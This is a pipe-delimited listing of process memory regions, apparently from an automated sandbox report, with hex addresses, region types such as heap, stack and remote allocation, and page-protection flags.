||
|
2E4C000
|
unkown
|
page read and write
|
||
|
D5000
|
unkown
|
page read and write
|
||
|
1A47E5F5000
|
heap
|
page read and write
|
||
|
6740000
|
direct allocation
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
283D000
|
stack
|
page read and write
|
||
|
795C000
|
stack
|
page read and write
|
||
|
1A47F350000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
CE000
|
unkown
|
page readonly
|
||
|
2537BB01000
|
trusted library allocation
|
page read and write
|
||
|
6120000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
1378000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
34DC000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
6750000
|
heap
|
page read and write
|
||
|
21A8F000
|
stack
|
page read and write
|
||
|
873F000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
2A54000
|
heap
|
page read and write
|
||
|
517A000
|
trusted library allocation
|
page read and write
|
||
|
21491BEC000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
1A21000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7DC5000
|
heap
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
525A000
|
trusted library allocation
|
page read and write
|
||
|
1ACAFCD5000
|
heap
|
page read and write
|
||
|
77AF000
|
stack
|
page read and write
|
||
|
13D1000
|
unkown
|
page readonly
|
||
|
4BDB000
|
heap
|
page read and write
|
||
|
1A47F191000
|
heap
|
page read and write
|
||
|
430B000
|
remote allocation
|
page execute and read and write
|
||
|
2537BA0F000
|
trusted library allocation
|
page read and write
|
||
|
2189F000
|
stack
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
34C3000
|
heap
|
page read and write
|
||
|
22500000
|
unclassified section
|
page execute and read and write
|
||
|
F44000
|
trusted library allocation
|
page read and write
|
||
|
2CCF000
|
stack
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
CD2000
|
heap
|
page read and write
|
||
|
64A5000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
496C000
|
stack
|
page read and write
|
||
|
A4375FE000
|
stack
|
page read and write
|
||
|
FC8000
|
system
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
211B0000
|
direct allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
1378000
|
heap
|
page read and write
|
||
|
214934A0000
|
heap
|
page readonly
|
||
|
D78000
|
heap
|
page read and write
|
||
|
4BEB000
|
heap
|
page read and write
|
||
|
59A1000
|
trusted library allocation
|
page read and write
|
||
|
48BE000
|
stack
|
page read and write
|
||
|
F70000
|
trusted library allocation
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
21E6D000
|
stack
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
21BD0000
|
heap
|
page read and write
|
||
|
6208000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
2E10000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
21610000
|
direct allocation
|
page read and write
|
||
|
227A1000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
DE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
21491C05000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
492A000
|
stack
|
page read and write
|
||
|
7F240000
|
trusted library allocation
|
page execute and read and write
|
||
|
6204000
|
heap
|
page read and write
|
||
|
380D000
|
heap
|
page read and write
|
||
|
2B72000
|
unkown
|
page read and write
|
||
|
21960780000
|
heap
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
4A6E000
|
stack
|
page read and write
|
||
|
1320000
|
unkown
|
page read and write
|
||
|
2A8287E000
|
stack
|
page read and write
|
||
|
824F000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
CC1000
|
unkown
|
page readonly
|
||
|
5437000
|
trusted library allocation
|
page read and write
|
||
|
50A0000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
4B27000
|
trusted library allocation
|
page read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
21493D40000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
31B8000
|
heap
|
page read and write
|
||
|
86E0000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
770E000
|
stack
|
page read and write
|
||
|
21493641000
|
trusted library allocation
|
page read and write
|
||
|
1A47F393000
|
heap
|
page read and write
|
||
|
3550000
|
heap
|
page read and write
|
||
|
27CD000
|
stack
|
page read and write
|
||
|
31FE000
|
unkown
|
page read and write
|
||
|
74E000
|
unkown
|
page read and write
|
||
|
214ABC20000
|
heap
|
page read and write
|
||
|
38C0000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
ED0000
|
unkown
|
page readonly
|
||
|
F4A000
|
stack
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
2149560E000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
4FD7000
|
trusted library allocation
|
page read and write
|
||
|
5315000
|
trusted library allocation
|
page read and write
|
||
|
7C5E000
|
stack
|
page read and write
|
||
|
211E0000
|
direct allocation
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
6213000
|
heap
|
page read and write
|
||
|
1ACAF998000
|
heap
|
page read and write
|
||
|
214936C6000
|
trusted library allocation
|
page read and write
|
||
|
7DB4000
|
heap
|
page read and write
|
||
|
3012000
|
heap
|
page read and write
|
||
|
438E000
|
stack
|
page read and write
|
||
|
228AB000
|
heap
|
page read and write
|
||
|
1A47E598000
|
heap
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
1A47E500000
|
heap
|
page read and write
|
||
|
758E000
|
heap
|
page read and write
|
||
|
4FEA000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
21B4C000
|
stack
|
page read and write
|
||
|
861B000
|
stack
|
page read and write
|
||
|
6491000
|
heap
|
page read and write
|
||
|
752E000
|
stack
|
page read and write
|
||
|
F5233FE000
|
stack
|
page read and write
|
||
|
21491BB5000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
5233000
|
heap
|
page read and write
|
||
|
295E000
|
stack
|
page read and write
|
||
|
64FB000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
4852000
|
trusted library allocation
|
page read and write
|
||
|
D8F000
|
heap
|
page read and write
|
||
|
356C000
|
heap
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
440C000
|
stack
|
page read and write
|
||
|
22692000
|
heap
|
page read and write
|
||
|
21960810000
|
heap
|
page read and write
|
||
|
21495257000
|
trusted library allocation
|
page read and write
|
||
|
895000
|
heap
|
page read and write
|
||
|
775C000
|
heap
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A47E5EF000
|
heap
|
page read and write
|
||
|
7D9F000
|
stack
|
page read and write
|
||
|
77B4000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
5FF0000
|
heap
|
page read and write
|
||
|
876C000
|
stack
|
page read and write
|
||
|
315F000
|
stack
|
page read and write
|
||
|
39D42000
|
system
|
page read and write
|
||
|
4BB9000
|
heap
|
page read and write
|
||
|
7DC2000
|
heap
|
page read and write
|
||
|
2E7C000
|
stack
|
page read and write
|
||
|
D40000
|
unkown
|
page readonly
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
7413000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
47E9000
|
stack
|
page read and write
|
||
|
95F000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
772F000
|
heap
|
page read and write
|
||
|
33DE000
|
heap
|
page read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
61F0000
|
heap
|
page read and write
|
||
|
1A47E8AE000
|
heap
|
page read and write
|
||
|
756D000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
843E000
|
stack
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
8197000
|
stack
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
8644000
|
heap
|
page read and write
|
||
|
4A95000
|
heap
|
page execute and read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
1A47E686000
|
heap
|
page read and write
|
||
|
5732000
|
heap
|
page read and write
|
||
|
73C7000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
4A32000
|
trusted library allocation
|
page read and write
|
||
|
7DB7000
|
heap
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
2537BBBE000
|
trusted library allocation
|
page read and write
|
||
|
4CCE000
|
stack
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
927A000
|
direct allocation
|
page execute and read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1A47E65F000
|
heap
|
page read and write
|
||
|
2559000
|
stack
|
page read and write
|
||
|
4D0F000
|
stack
|
page read and write
|
||
|
7F330000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E4C000
|
unkown
|
page read and write
|
||
|
21A8E000
|
stack
|
page read and write
|
||
|
2149410F000
|
trusted library allocation
|
page read and write
|
||
|
74A9000
|
heap
|
page read and write
|
||
|
7482000
|
heap
|
page read and write
|
||
|
21C7F000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
214940BE000
|
trusted library allocation
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
85EE000
|
stack
|
page read and write
|
||
|
214ABDC9000
|
heap
|
page read and write
|
||
|
3561000
|
heap
|
page read and write
|
||
|
6204000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
357D000
|
heap
|
page read and write
|
||
|
4840000
|
heap
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
6F50000
|
direct allocation
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
7040000
|
direct allocation
|
page read and write
|
||
|
21960B94000
|
heap
|
page read and write
|
||
|
2181E000
|
stack
|
page read and write
|
||
|
3579000
|
heap
|
page read and write
|
||
|
776E000
|
stack
|
page read and write
|
||
|
4CF3000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
5FF4000
|
heap
|
page read and write
|
||
|
A4372FE000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
2A20000
|
heap
|
page readonly
|
||
|
1A47E4D0000
|
heap
|
page read and write
|
||
|
6204000
|
heap
|
page read and write
|
||
|
74F1000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
49FA000
|
remote allocation
|
page execute and read and write
|
||
|
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
222E0000
|
direct allocation
|
page read and write
|
||
|
58A4000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
22BA0000
|
heap
|
page read and write
|
||
|
D5000
|
unkown
|
page read and write
|
||
|
89B0000
|
direct allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21491B50000
|
heap
|
page read and write
|
||
|
356A000
|
heap
|
page read and write
|
||
|
4D0B000
|
remote allocation
|
page execute and read and write
|
||
|
44D0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
90E0000
|
direct allocation
|
page execute and read and write
|
||
|
228AA000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
2C32000
|
unkown
|
page read and write
|
||
|
CE000
|
unkown
|
page readonly
|
||
|
F72000
|
trusted library allocation
|
page read and write
|
||
|
E4E000
|
stack
|
page read and write
|
||
|
2917000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
C1000
|
unkown
|
page execute read
|
||
|
59A0000
|
heap
|
page read and write
|
||
|
1A47E636000
|
heap
|
page read and write
|
||
|
776E000
|
heap
|
page read and write
|
||
|
4730000
|
heap
|
page read and write
|
||
|
620D000
|
heap
|
page read and write
|
||
|
D60000
|
unkown
|
page read and write
|
||
|
3578000
|
heap
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
4F1C000
|
stack
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
2185E000
|
stack
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
21491BCD000
|
heap
|
page read and write
|
||
|
26AB000
|
stack
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
320E000
|
unkown
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
620D000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
3545000
|
heap
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
6400000
|
direct allocation
|
page read and write
|
||
|
1A47ECA9000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
4BB9000
|
heap
|
page read and write
|
||
|
1A47EC46000
|
heap
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
3568000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
D7000
|
unkown
|
page readonly
|
||
|
2A825CF000
|
stack
|
page read and write
|
||
|
356A000
|
heap
|
page read and write
|
||
|
221BD000
|
stack
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
D99000
|
heap
|
page read and write
|
||
|
295E000
|
unkown
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5368000
|
trusted library allocation
|
page read and write
|
||
|
623C000
|
stack
|
page read and write
|
||
|
1A47E8A9000
|
heap
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
53E4000
|
trusted library allocation
|
page read and write
|
||
|
C60000
|
heap
|
page read and write
|
||
|
21BDC000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
25379EDC000
|
heap
|
page read and write
|
||
|
22069000
|
direct allocation
|
page execute and read and write
|
||
|
CE000
|
unkown
|
page readonly
|
||
|
214940F3000
|
trusted library allocation
|
page read and write
|
||
|
C0A000
|
heap
|
page read and write
|
||
|
5500000
|
heap
|
page read and write
|
||
|
7270000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
291D000
|
stack
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
7711000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
2A8394E000
|
stack
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
4BE8000
|
heap
|
page read and write
|
||
|
54DC000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
5FFE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
6F60000
|
direct allocation
|
page read and write
|
||
|
29DF000
|
stack
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
2A82EFF000
|
stack
|
page read and write
|
||
|
21493470000
|
trusted library allocation
|
page read and write
|
||
|
1A47EC46000
|
heap
|
page read and write
|
||
|
CD0000
|
unkown
|
page read and write
|
||
|
2149582A000
|
trusted library allocation
|
page read and write
|
||
|
486E000
|
stack
|
page read and write
|
||
|
1A47E658000
|
heap
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
38C6000
|
heap
|
page read and write
|
||
|
D7000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1A47E686000
|
heap
|
page read and write
|
||
|
211F0000
|
direct allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
6DD0000
|
heap
|
page execute and read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
35EF000
|
stack
|
page read and write
|
||
|
7DBA000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8571000
|
heap
|
page read and write
|
||
|
650C000
|
heap
|
page read and write
|
||
|
2A82503000
|
stack
|
page read and write
|
||
|
4FD5000
|
heap
|
page read and write
|
||
|
227A1000
|
heap
|
page read and write
|
||
|
579F000
|
stack
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
34D3000
|
heap
|
page read and write
|
||
|
2C1F000
|
unkown
|
page read and write
|
||
|
620D000
|
heap
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
|
21E2E000
|
stack
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
59D1000
|
trusted library allocation
|
page read and write
|
||
|
211C0000
|
direct allocation
|
page read and write
|
||
|
21495606000
|
trusted library allocation
|
page read and write
|
||
|
21190000
|
direct allocation
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
8607000
|
trusted library allocation
|
page read and write
|
||
|
1A47E5EF000
|
heap
|
page read and write
|
||
|
8FA000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
838D000
|
stack
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
214A3947000
|
trusted library allocation
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
220BB000
|
stack
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
1370000
|
heap
|
page read and write
|
||
|
3578000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
D40000
|
unkown
|
page readonly
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
8530000
|
heap
|
page read and write
|
||
|
23A97000
|
unclassified section
|
page execute and read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
353E000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2D4F000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21CFF000
|
heap
|
page read and write
|
||
|
4BC7000
|
heap
|
page read and write
|
||
|
2C2F000
|
unkown
|
page read and write
|
||
|
2149584E000
|
trusted library allocation
|
page read and write
|
||
|
646D000
|
heap
|
page read and write
|
||
|
4BC6000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21494A34000
|
trusted library allocation
|
page read and write
|
||
|
620D000
|
heap
|
page read and write
|
||
|
59C9000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page read and write
|
||
|
4F14000
|
unclassified section
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
43CE000
|
stack
|
page read and write
|
||
|
772A000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
7697000
|
trusted library allocation
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
21491BB0000
|
heap
|
page read and write
|
||
|
D3F000
|
heap
|
page read and write
|
||
|
58A5000
|
heap
|
page read and write
|
||
|
1300000
|
unkown
|
page read and write
|
||
|
63E0000
|
direct allocation
|
page read and write
|
||
|
32FF000
|
unkown
|
page read and write
|
||
|
75F0000
|
heap
|
page execute and read and write
|
||
|
8300000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
21D50000
|
direct allocation
|
page read and write
|
||
|
2F4F000
|
stack
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21491C10000
|
heap
|
page read and write
|
||
|
770D000
|
stack
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
DF5000
|
heap
|
page read and write
|
||
|
3545000
|
heap
|
page read and write
|
||
|
5741000
|
heap
|
page read and write
|
||
|
8630000
|
heap
|
page read and write
|
||
|
3566000
|
heap
|
page read and write
|
||
|
496B000
|
stack
|
page read and write
|
||
|
7779000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
25D0000
|
heap
|
page read and write
|
||
|
737E000
|
stack
|
page read and write
|
||
|
4FB8000
|
heap
|
page read and write
|
||
|
3552000
|
heap
|
page read and write
|
||
|
DB0000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7DBD000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
5FF5000
|
heap
|
page read and write
|
||
|
2206D000
|
direct allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21493B79000
|
trusted library allocation
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
2F63000
|
heap
|
page read and write
|
||
|
333B000
|
stack
|
page read and write
|
||
|
4C83000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
23B05000
|
unclassified section
|
page execute and read and write
|
||
|
F40000
|
trusted library allocation
|
page read and write
|
||
|
62F000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
21A4D000
|
stack
|
page read and write
|
||
|
53F1000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
21494C87000
|
trusted library allocation
|
page read and write
|
||
|
2537BA03000
|
trusted library allocation
|
page read and write
|
||
|
2F5D000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
6FEA000
|
stack
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
21F60000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2220D000
|
direct allocation
|
page execute and read and write
|
||
|
6EAE000
|
stack
|
page read and write
|
||
|
4FCF000
|
trusted library allocation
|
page read and write
|
||
|
55D000
|
stack
|
page read and write
|
||
|
214ABD20000
|
heap
|
page read and write
|
||
|
64AF000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2A82BFE000
|
stack
|
page read and write
|
||
|
570B000
|
remote allocation
|
page execute and read and write
|
||
|
3FFA000
|
remote allocation
|
page execute and read and write
|
||
|
5233000
|
heap
|
page read and write
|
||
|
53CC000
|
heap
|
page read and write
|
||
|
8705000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
F0C000
|
heap
|
page read and write
|
||
|
2207F000
|
stack
|
page read and write
|
||
|
4353000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21493490000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
unkown
|
page readonly
|
||
|
357D000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
21180000
|
direct allocation
|
page read and write
|
||
|
1A47E657000
|
heap
|
page read and write
|
||
|
851E000
|
stack
|
page read and write
|
||
|
3562000
|
heap
|
page read and write
|
||
|
4BD8000
|
heap
|
page read and write
|
||
|
276C000
|
stack
|
page read and write
|
||
|
EE0000
|
unkown
|
page readonly
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
774D000
|
heap
|
page read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BD6000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BD6000
|
heap
|
page read and write
|
||
|
7467000
|
trusted library allocation
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
7795000
|
heap
|
page read and write
|
||
|
49F0000
|
heap
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1311000
|
unkown
|
page readonly
|
||
|
711E000
|
stack
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2537B6D0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8A4000
|
heap
|
page read and write
|
||
|
4955000
|
unkown
|
page execute and read and write
|
||
|
8350000
|
trusted library allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
764A000
|
heap
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
7DF499E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1040000
|
unkown
|
page readonly
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
21960B95000
|
heap
|
page read and write
|
||
|
2A52000
|
heap
|
page read and write
|
||
|
59D1000
|
heap
|
page read and write
|
||
|
3014000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
557F000
|
stack
|
page read and write
|
||
|
3234000
|
unkown
|
page read and write
|
||
|
33DA000
|
heap
|
page read and write
|
||
|
6EF0000
|
direct allocation
|
page read and write
|
||
|
1A47F381000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
356D000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4E28000
|
trusted library allocation
|
page read and write
|
||
|
364E000
|
stack
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
8360000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1A47EE00000
|
heap
|
page read and write
|
||
|
490E000
|
stack
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
7642000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2223C000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
4EDB000
|
stack
|
page read and write
|
||
|
7790000
|
